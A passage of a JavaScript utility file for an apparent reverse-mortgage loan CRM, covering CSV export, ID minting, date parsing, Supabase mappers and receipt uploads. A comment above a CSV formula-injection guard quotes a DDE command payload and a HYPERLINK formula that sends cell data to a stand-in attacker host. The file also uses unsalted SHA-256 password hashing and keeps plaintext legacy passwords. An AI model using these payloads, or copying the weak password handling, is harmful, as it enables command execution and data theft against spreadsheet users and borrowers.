// src/lib.js
// Extracted from App.jsx — behavior-preserving split (2026-07-20).

import React from "react";
import { supabase } from './supabase';
import { packReimbursements, unpackReimbursements } from './reimbursements';
import { CALL_CLICKS_MAX, CALL_LOG_KEY, CALL_LOG_MAX, CONTACT_LOG_MAX, FALLOUT_STAGES, LOCK_STAGE, LS_KEY, LS_LEADS_SKIP_THRESHOLD, QUOTE_LOG_MAX, SSA_ACCOUNT_URL, STAGES, SWAP_HISTORY_MAX, URGENT_ACK_KEY, normalizeStage, MANUAL_DEAL_PROGRAMS, MANUAL_DEAL_LABEL, HS2_LOAN_TYPE } from './constants';

// ── CSV cells Excel would run as a formula ──
// A cell that starts with = + - @ (or a tab / CR) is a formula to Excel —
// "=cmd|' /C calc'!A0" (DDE), =HYPERLINK("https://evil/?"&K2,"Open") — and
// quoting it does NOT stop that. Every export that can carry outside text (a
// tracker sender's display name, a vendor Claude read off a receipt, a name
// typed into the public intake) gets a leading apostrophe on such a cell. A
// "-" is left alone only when the WHOLE cell is a plain number ("-74.60"):
// "-1+cmd|…" and "-0+HYPERLINK(…)" are formulas too. One rule for every CSV
// the app writes: exportCSV below and the expense ready file (readyGuard).
var CSV_FORMULA_RE=/^[=+@\t\r]|^-(?!\d+(?:\.\d+)?$|\.\d+$)/;
function csvFormulaGuard(v){var s=String(v==null?"":v);return CSV_FORMULA_RE.test(s)?"'"+s:s;}
// One cell: guarded, then always quoted.
function csvCell(v){return'"'+csvFormulaGuard(v).replace(/"/g,'""')+'"';}
function toCSV(headers,rows){
  return[headers||[]].concat(rows||[]).map(function(r){return(r||[]).map(csvCell).join(",");}).join("\n");
}
const exportCSV=function(filename,headers,rows){
  var csv=toCSV(headers,rows);
  var blob=new Blob([csv],{type:"text/csv"});var url=URL.createObjectURL(blob);var a=document.createElement("a");a.href=url;a.download=filename;a.click();URL.revokeObjectURL(url);
};


// ── Loan ID helper — uses max existing numeric ID to avoid collisions after archive/delete ──
// Each staff member mints from their OWN series — Reece "LN-###", Max
// "LN-M###" — so the two can never mint the same id inside the 30s window
// before one sees the other's new file (a shared max+1 did, and the second
// save overwrote the first person's file). The save also refuses to write a
// new file over an id the server already has (see saveLoansMerged).
function nextLoanId(loans,staff){
  var max=0;var isMax=staff==="max";
  var re=isMax?/^LN-M(\d+)$/:/^LN-(\d+)$/;
  (loans||[]).forEach(function(l){
    var m=l&&l.id&&String(l.id).match(re);
    if(m){var n=parseInt(m[1],10);if(n>max)max=n;}
  });
  return(isMax?"LN-M":"LN-")+String(max+1).padStart(3,"0");
}

// ── Calendar day → Date at LOCAL NOON ──
// new Date("1950-03-04") is UTC midnight, which is still March 3rd anywhere
// west of Greenwich — every Pacific/Eastern user's DOB math was a day early
// (an age flipped a day late on the birthday itself). Accepts "YYYY-MM-DD"
// (an ISO date, optionally followed by a time that is ignored) or "M/D/YYYY";
// returns null for anything else or an impossible day (2/30). Noon keeps the
// day stable across DST shifts. Use for DOB/age and any calendar-day math.
function parseDateLocal(str){
  if(str instanceof Date)return isNaN(str.getTime())?null:new Date(str.getFullYear(),str.getMonth(),str.getDate(),12);
  var s=String(str==null?"":str).trim();if(!s)return null;
  var y,m,d,r=/^(\d{4})-(\d{1,2})-(\d{1,2})(?:$|[T ])/.exec(s);
  if(r){y=+r[1];m=+r[2];d=+r[3];}
  else{r=/^(\d{1,2})\/(\d{1,2})\/(\d{4})$/.exec(s);if(!r)return null;m=+r[1];d=+r[2];y=+r[3];}
  if(m<1||m>12||d<1||d>31)return null;
  var dt=new Date(y,m-1,d,12);
  return(dt.getFullYear()===y&&dt.getMonth()===m-1&&dt.getDate()===d)?dt:null;
}
// ── DOB → exact age. Calendar-correct: only counts a year once the birthday
// has actually passed — never rounds. Returns null when no/invalid DOB so
// callers can fall back to a legacy stored age. The DOB is parsed as a LOCAL
// calendar day (parseDateLocal); other free-text formats fall back to Date.
function ageFromDobStr(d){
  if(!d)return null;
  var b=parseDateLocal(d);
  // A well-formed but impossible day (2/30) is invalid, not "try harder".
  if(!b){if(/^\s*(\d{4}-\d{1,2}-\d{1,2}|\d{1,2}\/\d{1,2}\/\d{4})\s*$/.test(String(d)))return null;b=new Date(d);if(isNaN(b.getTime()))return null;}
  var n=new Date();var a=n.getFullYear()-b.getFullYear();
  if(n.getMonth()<b.getMonth()||(n.getMonth()===b.getMonth()&&n.getDate()<b.getDate()))a--;
  return a>0&&a<130?a:null;
}
// Best-available age for a loan: exact from DOB when present, else legacy field.
function loanAge(l){var a=ageFromDobStr(l&&l.dob);return a!=null?a:(l&&l.age)||null;}

// ── Two staff users (Reece, Max) ──
// Owner says who works a file. Reece sees every file (his Mine · Max · All
// toggle); since 10/2 Max sees and writes ONLY files owned by "max" (his own
// pipeline — RLS on the loans.owner column, supabase/2026-10-02-max-own-
// pipeline.sql). Loans carry `owner` in the loans.owner column AND, as
// before, packed into follow_ups._wf (the copy every older reader knows); a
// lead carries it as one "owner:<key>" tag. No owner on a loan = Reece's
// (every file before 2026-10-01 was his).
var STAFF_KEYS=["reece","max"];
function isStaffKey(k){return STAFF_KEYS.indexOf(k)>=0;}
function ownerOf(loan){return(loan&&loan.owner)||"reece";}
function leadOwner(lead){
  var t=(lead&&lead.tags)||[];
  for(var i=0;i<t.length;i++){var m=/^owner:(.+)$/.exec(String(t[i]||""));if(m&&isStaffKey(m[1]))return m[1];}
  return null;
}
// Copy of the lead with its owner:* tags replaced by owner:<key> (null/""
// removes them). Bumps updated_at so the other user's poll picks it up.
function withLeadOwner(lead,key){
  if(!lead)return lead;
  if(key&&!isStaffKey(key))return lead;
  var tags=(lead.tags||[]).filter(function(t){return !/^owner:/.test(String(t||""));});
  if(key)tags.push("owner:"+key);
  return Object.assign({},lead,{tags:tags,updated_at:new Date().toISOString()});
}
// Claim an UNOWNED lead for whoever just worked it. An existing owner is
// never overwritten here — reassigning is an explicit choice in the UI.
function stampLeadOwner(lead,staff){
  if(!lead||!isStaffKey(staff)||leadOwner(lead))return lead;
  return withLeadOwner(lead,staff);
}
// The pipeline file a lead became: the lead's own converted_loan_id link, else
// a file whose sourceLeadId points back at it (a live one before an archived
// one). null when the lead was never converted.
function convertedLoanFor(lead,loans){
  if(!lead||!lead.id)return null;
  var arr=loans||[];var i;
  if(lead.converted_loan_id){for(i=0;i<arr.length;i++){if(arr[i]&&arr[i].id===lead.converted_loan_id)return arr[i];}}
  var hit=null;
  for(i=0;i<arr.length;i++){var l=arr[i];if(l&&l.sourceLeadId===lead.id){if(!l.archived)return l;if(!hit)hit=l;}}
  return hit;
}
function fmtDob(d){if(!d)return"";var p=String(d).split("-");return p.length===3?p[1]+"/"+p[2]+"/"+p[0]:String(d);}
// Index-based on STAGES (a fallout or unknown stage is -1: never "past"
// anything). A pre-10/1 stage name counts as the stage it became.
function stageAtOrPast(loan,stageName){return STAGES.indexOf(normalizeStage(loan&&loan.stage))>=STAGES.indexOf(normalizeStage(stageName));}
// A file that was worked and priced but never pitched. Fallout files also
// carry archived:true, so anything already filtering on archived hides them
// automatically — use this only where fallout needs its OWN treatment
// (the Fallout board, the stage dropdown, disposition badges).
function isFallout(loan){return FALLOUT_STAGES.indexOf(loan&&loan.stage)>=0;}

// ── Derived "Top To-Dos" for a deal — what can be done RIGHT NOW to keep it
// moving. Combines workflow-state items (call back, run numbers, counselor
// package) with the loan's own task list. Urgent items sort first.
function topTodos(loan){
  var out=[];
  if(loan.queue==="callin")out.push({t:"Return their call — reached out, not yet spoken to",urgent:true});
  if(loan.queue==="numbers")out.push({t:"Run the numbers — spoken to, nothing priced yet",urgent:true});
  if(stageAtOrPast(loan,LOCK_STAGE)&&!stageAtOrPast(loan,"Docs Out")){
    if(!loan.counselorSent)out.push({t:"Send borrower info package to the counselor",urgent:true});
    if(!(loan.counselingDate||(loan.counseling&&loan.counseling.date)))out.push({t:"Enter the counseling date",urgent:false});
  }
  var docs=loan.docs||{};
  [["hoa","HOA cert"],["payoff","payoff statement"],["ins","insurance dec page"],["app","application"]].forEach(function(p){
    if(docs[p[0]]==="flagged")out.push({t:"Resolve flagged "+p[1],urgent:true});
    else if(docs[p[0]]==="pending")out.push({t:"Chase "+p[1]+" (pending)",urgent:false});
  });
  (loan.tasks||[]).forEach(function(t){out.push({t:t,urgent:t.startsWith("URGENT")||t.startsWith("CALLBACK")});});
  out.sort(function(a,b){return(b.urgent?1:0)-(a.urgent?1:0);});
  return out;
}


// ── Password hashing — SHA-256 via Web Crypto API ──
async function hashPassword(pw){
  const buf=await window.crypto.subtle.digest("SHA-256",new TextEncoder().encode(pw));
  return Array.from(new Uint8Array(buf)).map(b=>b.toString(16).padStart(2,"0")).join("");
}
// Sync hash check — compares raw value against stored hash or legacy plaintext
// During migration: if stored value is not a 64-char hex string, treat as legacy plaintext
function isLegacyPassword(stored){return!/^[0-9a-f]{64}$/.test(stored);}
// The cache can hold files saved under the pre-10/1 stage names (it is what
// App renders before — or without — Supabase), so their stages are brought
// forward here like loanFromDb does for database rows.
function loadState(){
  try{
    const raw=localStorage.getItem(LS_KEY);
    if(raw){
      const s=JSON.parse(raw);
      if(s&&Array.isArray(s.loans))s.loans=s.loans.map(function(l){
        if(!l||typeof l!=="object")return l;
        var st=normalizeStage(l.stage);
        return st===l.stage?l:Object.assign({},l,{stage:st});
      });
      return s;
    }
  }catch(e){}
  return null;
}

// saveState — never throws, never crashes the caller.
//
// Strategy: build a tiered list of candidate snapshots, from full to
// minimal, and try them in order. The first one that fits the browser's
// localStorage quota wins. If the user hits the wall (quota or stringify
// failure) we degrade gracefully instead of letting the exception bubble
// up into the React render tree and blank the screen.
//
// The tiers are:
//   0  full state (with base64 file data already stripped to "[stored]")
//   1  drop mktgLeads (kept in Supabase anyway)
//   2  drop mktgLeads + campaigns + smsLog + mailTemplates
//   3  loans + settings only — minimal usable cache
//   4  settings only — last resort so login + admin password fallback work
//
// If the leads count is already past the threshold we skip tier 0 to
// save ~5MB of pointless stringify on every keystroke.
function saveState(state){
  if(!state||typeof state!=="object")return;
  const arr=(v)=>Array.isArray(v)?v:[];
  const loans=arr(state.loans);
  const mktgLeads=arr(state.mktgLeads);
  const expenses=arr(state.expenses);
  const campaigns=arr(state.campaigns);
  const smsLog=arr(state.smsLog);
  const borrowerAccts=arr(state.borrowerAccts);
  const abTests=arr(state.abTests);
  const touchSchedule=arr(state.touchSchedule);
  const mailTemplates=arr(state.mailTemplates);

  // Strip base64 file blobs — those live in Supabase Storage now;
  // keeping them in localStorage would blow past quota immediately.
  const slimLoans=loans.map(l=>Object.assign({},l,{
    uploads:arr(l.uploads).map(u=>Object.assign({},u,{data:u.data?"[stored]":null})),
    pushedDocs:arr(l.pushedDocs).map(d=>Object.assign({},d,{data:d.data?"[stored]":null})),
  }));
  const slimExpenses=expenses.map(e=>Object.assign({},e,{receipt:e.receipt?"[stored]":null}));
  const slimCampaigns=campaigns.map(c=>Object.assign({},c,{piece:c.piece?"[stored]":null}));
  const slimMailTemplates=mailTemplates.map(t=>Object.assign({},t,{image:t.image?"[stored]":null}));

  const base={loans:slimLoans,expenses:slimExpenses,campaigns:slimCampaigns,mailTemplates:slimMailTemplates,
    mktgLeads,smsLog,borrowerAccts,settings:state.settings,abTests,touchSchedule};

  const tiers=[
    ()=>base,
    ()=>Object.assign({},base,{mktgLeads:[],_meta:{leadsOmitted:mktgLeads.length,reason:"perf"}}),
    ()=>Object.assign({},base,{mktgLeads:[],campaigns:[],smsLog:[],mailTemplates:[],_meta:{leadsOmitted:mktgLeads.length,reason:"quota-1"}}),
    ()=>({loans:slimLoans,settings:state.settings,borrowerAccts,_meta:{reason:"quota-2"}}),
    ()=>({settings:state.settings,_meta:{reason:"quota-3"}}),
  ];

  const startTier=mktgLeads.length>LS_LEADS_SKIP_THRESHOLD?1:0;
  for(let i=startTier;i<tiers.length;i++){
    let blob;
    try{blob=JSON.stringify(tiers[i]());}
    catch(e){console.warn("LoanFlow: stringify failed at tier "+i,e&&e.message);continue;}
    try{
      localStorage.setItem(LS_KEY,blob);
      if(i>startTier)console.warn("LoanFlow: localStorage save degraded to tier "+i+" (Supabase still has the full data)");
      return;
    }catch(e){
      const isQuota=e&&(e.name==="QuotaExceededError"||(e.code&&(e.code===22||e.code===1014)));
      if(!isQuota){console.warn("LoanFlow: localStorage setItem failed at tier "+i,e&&e.message);return;}
      // Quota error — try the next, smaller tier.
    }
  }
  console.warn("LoanFlow: even minimal localStorage save failed; persistence will skip until next change.");
}

// ── Supabase ↔ App state mappers ──
// Workflow fields added after the original schema (dob, working-list queue,
// counseling date / counselor-package tracking) ride inside the follow_ups
// jsonb column under a reserved "_wf" key — no schema migration needed, and
// the server-side borrower endpoints never write follow_ups so it can't be
// clobbered. loanFromDb unpacks and strips _wf so in-memory followUps stays
// a clean {docKey: days} map.
// Loan fields with no DB column of their own ride inside follow_ups._wf.
// Everything the New Call console gathers lives here: the priced scenarios
// (scenarioHistory was previously computed by Calc and then silently DROPPED
// on every save — it never survived a reload), the quote log, the fallout
// disposition, the follow-up clock, the contact log, and the extra mortgage
// detail (current rate/lender/PL) that the loans table has no room for.
// Arrays are capped so this jsonb blob can't grow without bound.
function wfPack(l){return{
  dob:l.dob||null,queue:l.queue||null,queueAt:l.queueAt||null,
  counselingDate:l.counselingDate||null,counselorSent:!!l.counselorSent,counselorSentAt:l.counselorSentAt||null,
  scenarioHistory:(l.scenarioHistory||[]).slice(-QUOTE_LOG_MAX),
  quoteLog:(l.quoteLog||[]).slice(-QUOTE_LOG_MAX),
  contactLog:(l.contactLog||[]).slice(-CONTACT_LOG_MAX),
  leadMeta:l.leadMeta||null,
  falloutReason:l.falloutReason||null,falloutAt:l.falloutAt||null,
  followUpDate:l.followUpDate||null,followUpNote:l.followUpNote||null,
  lastContactAt:l.lastContactAt||null,
  leadNotes:l.leadNotes||null,
  sourceLeadId:l.sourceLeadId||null,
  // "Where it stands" — the one-line status comment typed on the pipeline
  // board. Lives here so it persists (anything not in wfPack is dropped).
  statusNote:l.statusNote||null,statusNoteAt:l.statusNoteAt||null,
  // Interest level + Booked (src/interest.js, 10/9/26) — how Reece feels
  // about the deal and the booked switch he flips himself, each with the
  // stamp of when it was set (App's mergeLoanRow: newer stamp wins when two
  // devices changed the same one). Admin-only: api/borrower/loan.js strips _wf.
  interest:l.interest||null,interestAt:l.interestAt||null,
  booked:!!l.booked,bookedAt:l.bookedAt||null,
  // Click-to-call timestamps from the loan page (capped).
  callClicks:(l.callClicks||[]).slice(-CALL_CLICKS_MAX),
  // Which staff member works the file ("reece" | "max"; null = legacy → Reece).
  owner:l.owner||null,
  // Post-Closing Tracker (LoanDetail) — the funding checklist, the funded date
  // that starts the 6-month EPO clock, and the EPO/chargeback record. These
  // were written as top-level loan keys and silently DROPPED on every save.
  postClose:postClosePack(l),
  fundedDate:l.fundedDate||null,
  epo:{status:l.epo_status||null,date:l.epo_date||null,chargebackAmt:l.epo_chargebackAmt||null,notes:l.epo_notes||null},
  // Reimbursements owed to Reece on this file (src/reimbursements.js, 10/10/26)
  // — credit report, appraisal… he paid. Soft-deleted items stay (deletedAt)
  // so App's mergeLoanRow can merge the list by item id across devices.
  reimbursements:packReimbursements(l.reimbursements),
};}
// Every "postClose_<item>" checklist key on the loan (each holds the date it
// was ticked, "" when unticked) — generic, so a new checklist row persists
// without touching this mapper.
function postClosePack(l){
  var checks={};
  Object.keys(l||{}).forEach(function(k){if(/^postClose_./.test(k)&&l[k])checks[k.slice(10)]=l[k];});
  return{checks:checks,notes:l.postCloseNotes||null};
}
function postCloseUnpack(wf){
  var out={};var pc=wf.postClose||{};var checks=pc.checks||{};
  Object.keys(checks).forEach(function(k){out["postClose_"+k]=checks[k];});
  out.postCloseNotes=pc.notes||null;
  return out;
}
// ── loans.owner column (supabase/2026-10-02-max-own-pipeline.sql) ──
// Every save writes the file's owner to its own column (ownerOf: unowned =
// "reece") — that column is what RLS reads to give Max his files and nothing
// else. Until the SQL is run the column doesn't exist and PostgREST rejects
// the whole upsert (PGRST204 / 42703 naming "owner"): the save path retries
// ONCE without it (stripLoanOwner) and remembers for the session
// (markLoansOwnerColumnMissing), after which loanToDb leaves it off — the
// owner still rides in follow_ups._wf, so nothing is lost meanwhile. A
// sign-out forgets the latch (the SQL may have been run since).
var LOANS_OWNER_COL={missing:false};
function loansOwnerColumnMissing(){return LOANS_OWNER_COL.missing;}
function markLoansOwnerColumnMissing(){LOANS_OWNER_COL.missing=true;}
function resetLoansOwnerColumn(){LOANS_OWNER_COL.missing=false;}
// The column can be named in the message, the details or the hint depending on
// the PostgREST / Postgres version, so all three are read; an error that names
// a DIFFERENT column is never mistaken for this one.
function isLoanOwnerColumnError(err){
  if(!err)return false;
  var code=String(err.code||"");var msg=String(err.message||"");
  var txt=[msg,err.details,err.hint].filter(function(x){return x!=null&&x!=="";}).map(String).join(" ");
  var colErr=code==="42703"||code==="PGRST204"||/column .* does not exist|could not find the '[^']*' column/i.test(txt);
  return colErr&&(!txt||/\bowner\b/i.test(txt));
}
function stripLoanOwner(rows){return(rows||[]).map(function(r){if(!r||!Object.prototype.hasOwnProperty.call(r,"owner"))return r;var o=Object.assign({},r);delete o.owner;return o;});}
// _wf is the source of truth for the EPO record; the original epo_* columns
// are written as a plain projection of it so the data is queryable in SQL.
function loanToDb(l){var row=loanToDbRow(l);if(!LOANS_OWNER_COL.missing){var o=ownerOf(l);row.owner=isStaffKey(o)?o:"reece";}return row;}
function loanToDbRow(l){return{id:l.id,borrower_name:l.b||"",phone:l.ph||"",email:l.em||"",property:l.prop||"",loan_type:l.type||"HECM",stage:normalizeStage(l.stage)||"Pitched",is_condo:!!l.condo,fha_status:l.fha||null,age:l.age||0,home_value:l.hv||0,mortgage_balance:l.mb||0,source:l.src||"",referral:l.ref||null,dm_campaign:l.dmCampaign||null,commission:l.comm||0,est_close:l.estClose||"TBD",deal:l.deal||{},docs:l.docs||{},follow_ups:Object.assign({},l.followUps||{},{_wf:wfPack(l)}),statement_data:l.statementData||null,tasks:l.tasks||[],activity_log:l.activityLog||[],portal_logins:l.portalLogins||[],uploads:(l.uploads||[]).map(function(u){return Object.assign({},u,{data:undefined});}),pushed_docs:(l.pushedDocs||[]).map(function(d){return Object.assign({},d,{data:undefined});}),counseling:l.counseling||null,sms_consent:!!l.smsConsent,sms_consent_date:l.smsConsentDate||null,appraisal_ordered:l.appraisalOrdered||null,appraisal_scheduled:l.appraisalScheduled||null,appraisal_done:l.appraisalDone||null,epo_flag:l.epo_status==="triggered",epo_date:l.epo_date||null,epo_lender:l.epoLender||null,epo_amount:Number(l.epo_chargebackAmt)||null,archived:!!l.archived,streamlined_fa:!!l.streamlinedFA};}
// owner: the loans.owner column wins (it is what RLS reads); a row from
// before that column existed falls back to the copy in _wf.
// stage: a row still under a pre-10/1 name (Inquiry, Ready for Review, CTC…)
// reads as the stage it became (normalizeStage) — before the remap SQL runs
// as well as after — and loanToDb writes the new name back on its next save
// (App.jsx's mergeLoanRow normalizes the server row it merges against too).
function loanFromDb(r){var fu=Object.assign({},r.follow_ups||{});var wf=fu._wf||{};delete fu._wf;
  // A row saved before the EPO record moved into _wf: seed it from the columns.
  var epo=wf.epo||{status:r.epo_flag?"triggered":null,date:r.epo_date||null,chargebackAmt:r.epo_amount!=null&&Number(r.epo_amount)?String(Number(r.epo_amount)):null,notes:null};
  return Object.assign({id:r.id,dob:wf.dob||"",queue:wf.queue||null,queueAt:wf.queueAt||null,counselingDate:wf.counselingDate||null,counselorSent:!!wf.counselorSent,counselorSentAt:wf.counselorSentAt||null,scenarioHistory:wf.scenarioHistory||[],quoteLog:wf.quoteLog||[],contactLog:wf.contactLog||[],leadMeta:wf.leadMeta||null,falloutReason:wf.falloutReason||null,falloutAt:wf.falloutAt||null,followUpDate:wf.followUpDate||null,followUpNote:wf.followUpNote||null,lastContactAt:wf.lastContactAt||null,leadNotes:wf.leadNotes||null,sourceLeadId:wf.sourceLeadId||null,statusNote:wf.statusNote||null,statusNoteAt:wf.statusNoteAt||null,interest:wf.interest||null,interestAt:wf.interestAt||null,booked:wf.booked===true,bookedAt:wf.bookedAt||null,callClicks:wf.callClicks||[],owner:(isStaffKey(r.owner)?r.owner:null)||wf.owner||null,fundedDate:wf.fundedDate||null,reimbursements:unpackReimbursements(wf.reimbursements),epo_status:epo.status||null,epo_date:epo.date||null,epo_chargebackAmt:epo.chargebackAmt||null,epo_notes:epo.notes||null,b:r.borrower_name,ph:r.phone,em:r.email,prop:r.property,type:r.loan_type,stage:normalizeStage(r.stage),condo:r.is_condo,fha:r.fha_status,age:r.age,hv:Number(r.home_value)||0,mb:Number(r.mortgage_balance)||0,src:r.source,ref:r.referral,dmCampaign:r.dm_campaign,comm:Number(r.commission)||0,estClose:r.est_close,deal:r.deal||{},docs:r.docs||{},followUps:fu,statementData:r.statement_data,tasks:r.tasks||[],activityLog:r.activity_log||[],portalLogins:r.portal_logins||[],uploads:r.uploads||[],pushedDocs:r.pushed_docs||[],counseling:r.counseling,smsConsent:r.sms_consent,smsConsentDate:r.sms_consent_date,appraisalOrdered:r.appraisal_ordered,appraisalScheduled:r.appraisal_scheduled,appraisalDone:r.appraisal_done,epoFlag:r.epo_flag,epoDate:r.epo_date,epoLender:r.epo_lender,epoAmount:r.epo_amount?Number(r.epo_amount):null,archived:r.archived,streamlinedFA:r.streamlined_fa},postCloseUnpack(wf));}
// admin_password_hash is deliberately NOT written: the real login is Supabase
// Auth, and every autosave used to write the legacy plaintext default back.
// The column has a DB default, so an insert without it is fine.
function settingsToDb(s){return{id:"singleton",admin_phone:s.adminPhone||"",lo_split:s.loSplit,hecm_limit:s.hecmLimit,dm_campaigns:s.dmCampaigns||[],rate_sheets:s.rateSheets||{},rc_enabled:!!s.rcEnabled,rc_client_id:s.rcClientId||"",rc_server_url:s.rcServerUrl||"",rc_sms_from:s.rcSmsFrom||""};}
function settingsFromDb(r){var s={adminPasswordHash:r.admin_password_hash,adminPhone:r.admin_phone||"",loSplit:r.lo_split,hecmLimit:r.hecm_limit,rcEnabled:!!r.rc_enabled,rcClientId:r.rc_client_id||"",rcServerUrl:r.rc_server_url||"",rcSmsFrom:r.rc_sms_from||""};if(r.dm_campaigns&&r.dm_campaigns.length>0)s.dmCampaigns=r.dm_campaigns;if(r.rate_sheets&&Object.keys(r.rate_sheets).length>0)s.rateSheets=r.rate_sheets;return s;}
// Slim payload = only the columns that exist in the ORIGINAL schema.sql.
// Used as the fallback when the 2026-09-09 expenses migration hasn't been run
// yet (PostgREST rejects the whole upsert if any column is unknown).
function expenseToDbSlim(e){return{id:e.id,date:e.date,category:e.cat||e.category||"",description:e.desc||e.description||"",amount:e.amount||0,loan_id:e.loanId||null,receipt_name:e.receiptName||null};}
// Full payload adds vendor / recurring / receipt_path (see
// supabase/2026-09-09-expenses-columns.sql). Before that migration these
// fields were silently dropped on every save and vanished on the next login.
// `owner` (supabase/2026-10-01-two-users.sql) = whose expense it is; RLS only
// lets each staff user read/write their own rows. The slim payload never
// carries it — before that migration the column does not exist.
function expenseToDb(e){var row=expenseToDbSlim(e);row.vendor=e.vendor||"";row.recurring=(e.recurring&&e.recurring!=="None")?e.recurring:null;row.next_due=e.nextDue||null;row.recurring_parent=e.recurringParent||null;row.receipt_path=e.receiptPath||null;row.notes=e.notes||"";row.owner=e.owner||"reece";return row;}
// Receipts uploaded from the Expenses page land at
// receipts/<expense id>/<file name> in the loan-documents bucket. Only for
// building an upload path / a last-try lookup in viewReceipt — a row's
// receiptPath comes from the DB alone (set only after a successful upload).
function expenseReceiptPath(id,name){return(id&&name)?"receipts/"+id+"/"+name:null;}
// A file name → the name its Storage object is saved under. Supabase Storage
// refuses a key with anything outside ASCII word characters and a few
// symbols ("Invalid key": ®, ’, –, é, CJK, emoji, [ ] { } ^ ~ ` | < > "),
// and storage-js puts the path into the URL unencoded, so a '#', '?' or '%'
// cuts the request short or stores it under another key. So: accents folded
// (NFKD, combining marks dropped), anything else outside [A-Za-z0-9._ ()-]
// → "_", ≤ 120 characters with the extension kept — the same allowlist
// api/borrower/docs.js and api/intake.js name uploads with. Use it for the
// PATH only: the row's receiptName keeps the name he sees.
// "Your eFax® invoice.pdf" → "Your eFax_ invoice.pdf"; "Reçu.pdf" → "Recu.pdf".
function safeStorageName(name,fallback){
  var s=String(name==null?"":name);
  try{s=s.normalize("NFKD");}catch(e){/* very old engine: the allowlist still applies */}
  s=s.replace(/[̀-ͯ]+/g,"").replace(/[^A-Za-z0-9._ ()-]+/g,"_").replace(/\s+/g," ").trim();
  if(s.length>120){var m=/\.[A-Za-z0-9]{1,8}$/.exec(s);var ext=m?m[0]:"";s=s.slice(0,120-ext.length).trim()+ext;}
  if(!s||/^[. _]*$/.test(s))s=fallback||"receipt";
  return s;
}
// A Storage "that key is taken" answer (upsert:false): 409, "Duplicate",
// "The resource already exists".
function isStorageConflict(err){
  if(!err)return false;
  var code=String(err.statusCode||err.status||"");
  return code==="409"||/already exists|duplicate/i.test(String(err.message||"")+" "+String(err.error||""));
}
function pathWithSuffix(path,tag){var m=/^(.*?)(\.[A-Za-z0-9]{1,8})?$/.exec(String(path));return m[1]+"-"+tag+(m[2]||"");}
// Upload a receipt into loan-documents WITHOUT ever overwriting an object
// that is already there (upsert:false). Two expenses can point at one stored
// receipt (split parts, several receipts in one PDF, a copy kept with its
// file), and a stale tab can mint an id another device already used — an
// overwrite silently swapped every one of them to the new file. When the key
// is taken, the name gets a short suffix (opts.tag — e.g. the file's
// fingerprint — first, then a random one) and it is tried again.
// opts: {contentType, tag}. → {path, error}: the path it was stored under —
// point the row at THIS one, not the one asked for — or the error.
async function uploadReceiptFile(path,file,opts){
  opts=opts||{};
  var bucket=supabase.storage.from('loan-documents');
  var up={upsert:false};if(opts.contentType)up.contentType=opts.contentType;
  var tag=String(opts.tag||"").replace(/[^A-Za-z0-9]/g,"").slice(0,10);
  var tries=[path];if(tag)tries.push(pathWithSuffix(path,tag));tries.push(null,null);
  var last=null;
  for(var i=0;i<tries.length;i++){
    var p=tries[i]||pathWithSuffix(path,Date.now().toString(36)+Math.random().toString(36).slice(2,6));
    var r;
    try{r=await bucket.upload(p,file,up);}catch(e){return{path:null,error:e||new Error("upload failed")};}
    if(r&&!r.error)return{path:p,error:null};
    last=(r&&r.error)||new Error("no answer from storage");
    if(!isStorageConflict(last))return{path:null,error:last};
  }
  return{path:null,error:last};
}
// receiptPath is ONLY what the DB says was stored. Deriving it from
// receipt_name made every never-uploaded receipt show a green "View" (and the
// autosave wrote that made-up path back), so "Re-upload" could never appear.
function expenseFromDb(r){var o={id:r.id,date:r.date,cat:r.category,desc:r.description,amount:Number(r.amount)||0,loanId:r.loan_id,vendor:r.vendor||"",notes:r.notes||"",receipt:null,receiptName:r.receipt_name,receiptPath:r.receipt_path||null,owner:r.owner||"reece"};if(r.recurring&&r.recurring!=="None"){o.recurring=r.recurring;o.nextDue=r.next_due||null;o.recurringParent=r.recurring_parent||null;}return o;}
// Next expense id. The old scheme was "EXP-" + (array length + 1): after any
// delete the length shrinks and the next add REUSES an existing id, which
// either upserts over an older row (silent data loss) or puts two rows with
// the same id in one upsert (Postgres 21000 → whole expenses save fails).
// max-existing-number + 1 can never collide with a row still in the list.
// Each staff user has their own prefix — Reece "EXP-", Max "EXM-" — because
// RLS hides the other user's rows: scanning only what you can see would mint
// an id the other user already holds. Only the caller's own prefix is scanned.
function nextExpenseId(list,offset,staff){
  var pre=staff==="max"?"EXM-":"EXP-";var max=0;
  (list||[]).forEach(function(e){var id=e&&e.id?String(e.id):"";if(id.indexOf(pre)!==0)return;var m=/^\d+$/.exec(id.slice(pre.length));if(m){var n=parseInt(m[0],10);if(n>max)max=n;}});
  return pre+String(max+1+(offset||0)).padStart(4,"0");
}
function baToDb(a){return{id:a.id,loan_id:a.loanId,borrower_name:a.borrowerName,password:a.password||null,password_hash:a.passwordHash||null,created:a.created};}
function baFromDb(r){return{id:r.id,loanId:r.loan_id,borrowerName:r.borrower_name,password:r.password||"",passwordHash:r.password_hash||"",created:r.created};}
// Maps a loan row returned by the borrower API (/api/borrower/login summary
// or /api/borrower/loan) — snake_case, a borrower-visible subset — into the
// camelCase shape BorrowerPortal renders. Mirrors loanFromDb for the exposed
// fields; anything the API doesn't return falls back to a sane default.
// Returns null for null input so callers can treat "no cached loan" cleanly.
// The stage goes through normalizeStage like loanFromDb (the API returns the
// column as stored, so a pre-10/1 name can still arrive).
function apiLoanToLocal(r){
  if(!r)return null;
  return{id:r.id,b:r.borrower_name||"",ph:r.phone||"",em:r.email||"",prop:r.property||"",type:r.loan_type||"HECM",stage:normalizeStage(r.stage)||"Pitched",estClose:r.est_close||"TBD",hv:Number(r.home_value)||0,mb:Number(r.mortgage_balance)||0,deal:r.deal||{},docs:r.docs||{},followUps:(function(f){var c=Object.assign({},f||{});delete c._wf;return c;})(r.follow_ups),statementData:r.statement_data||null,uploads:r.uploads||[],pushedDocs:r.pushed_docs||[],counseling:r.counseling||null,smsConsent:!!r.sms_consent,appraisalOrdered:r.appraisal_ordered||null,appraisalScheduled:r.appraisal_scheduled||null,appraisalDone:r.appraisal_done||null,streamlinedFA:!!r.streamlined_fa,portalLogins:r.portal_logins||[],tasks:[],activityLog:[]};
}
function defaultDocRequest(loan){
  var streamlined=!!(loan&&loan.streamlinedFA);
  return {
    application:{id:"app_docs",on:true,label:"Signed Application Documents",desc:"Review and e-sign your application package through the secure link sent to you by Quantum.",linkLabel:"Sign your application documents (Quantum)",link:""},
    supporting:[
      {id:"id",on:true,label:"Photo ID — front and back",desc:"Driver's license, state ID, or passport. Include the front and back (both sides required if your ID is expired)."},
      {id:"mortgage_stmt",on:true,label:"Most Recent Mortgage Statement — all pages",desc:"Your latest reverse mortgage statement. Please include every page."},
